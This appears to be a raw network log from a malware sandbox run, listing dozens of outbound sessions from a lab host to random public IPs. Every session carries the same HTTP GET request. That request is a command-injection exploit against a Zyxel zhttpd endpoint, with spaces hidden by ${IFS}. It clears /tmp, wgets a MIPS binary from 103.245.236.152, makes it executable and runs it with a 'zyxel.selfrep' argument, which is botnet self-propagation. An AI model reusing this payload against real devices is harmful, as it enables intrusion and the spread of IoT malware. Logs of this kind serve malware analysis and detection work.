                                        Jan 14, 2024 16:18:31.152625084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        841192.168.2.134170057.152.209.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152661085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        842192.168.2.1339894151.253.59.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152720928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        843192.168.2.133562299.226.87.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152772903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        844192.168.2.1348692149.221.122.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152797937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        845192.168.2.134126412.25.76.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152852058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        846192.168.2.135528859.119.197.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152873039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        847192.168.2.13429285.157.23.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152930975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        848192.168.2.1358406194.172.147.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152981043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        849192.168.2.1334152135.124.127.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153003931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        850192.168.2.1349992134.47.177.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153057098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        851192.168.2.135863646.171.56.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153100014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        852192.168.2.1356380164.18.90.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153152943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        853192.168.2.134090664.35.89.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153182030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        854192.168.2.135914047.114.163.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153237104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        855192.168.2.1351026108.10.193.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153280020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        856192.168.2.133877858.147.153.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153286934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        857192.168.2.135971685.210.151.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153317928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        858192.168.2.1356570216.120.80.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153371096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        859192.168.2.133356625.82.209.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153422117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        860192.168.2.133398850.9.239.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153460979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        861192.168.2.1359102219.75.125.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153517962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        862192.168.2.1340736165.251.182.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153570890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        863192.168.2.1358158160.198.232.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153580904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        864192.168.2.135288254.39.220.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153636932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        865192.168.2.1357090155.56.115.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153678894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        866192.168.2.135277696.241.232.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153712034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        867192.168.2.1336478212.134.162.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153740883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        868192.168.2.133615836.91.99.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153791904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        869192.168.2.13393161.205.253.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153825045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        870192.168.2.135546841.54.250.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153872013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        871192.168.2.134296437.29.178.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153908968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        872192.168.2.1340794208.74.221.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153939009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        873192.168.2.1344648148.62.86.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.153985977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        874192.168.2.1357568169.213.72.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154023886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        875192.168.2.1344218105.146.221.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154083014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        876192.168.2.1354908158.110.23.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154093981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        877192.168.2.133497471.221.251.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154158115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        878192.168.2.1354618115.228.109.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154170990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        879192.168.2.13487182.86.195.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154227972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        880192.168.2.1342576208.243.168.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154288054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        881192.168.2.134722869.145.172.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154321909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        882192.168.2.136095846.190.135.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154372931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        883192.168.2.135856445.189.200.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154406071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        884192.168.2.1344102157.130.95.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154428959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        885192.168.2.133914270.13.5.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154484034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        886192.168.2.133737417.75.224.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154526949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        887192.168.2.1351500145.224.150.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154557943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        888192.168.2.1346474192.144.16.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154650927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        889192.168.2.1360404198.203.238.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154689074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        890192.168.2.135197260.245.188.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154700994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        891192.168.2.135190078.234.41.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154711962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        892192.168.2.1353402142.138.100.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154736042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        893192.168.2.1350142104.244.139.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154737949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        894192.168.2.1338032125.255.185.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154783010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        895192.168.2.1355408196.228.204.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154814005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        896192.168.2.136061849.178.114.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154855013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        897192.168.2.13551964.1.0.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154891968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        898192.168.2.1355588105.89.29.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154911995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        899192.168.2.1343340209.33.228.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154961109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        900192.168.2.1360568103.126.94.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.154988050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        901192.168.2.134724018.86.83.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155036926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        902192.168.2.1342624151.32.64.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155081987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        903192.168.2.134646413.49.21.53443
                                        TimestampBytes transferredDirectionData
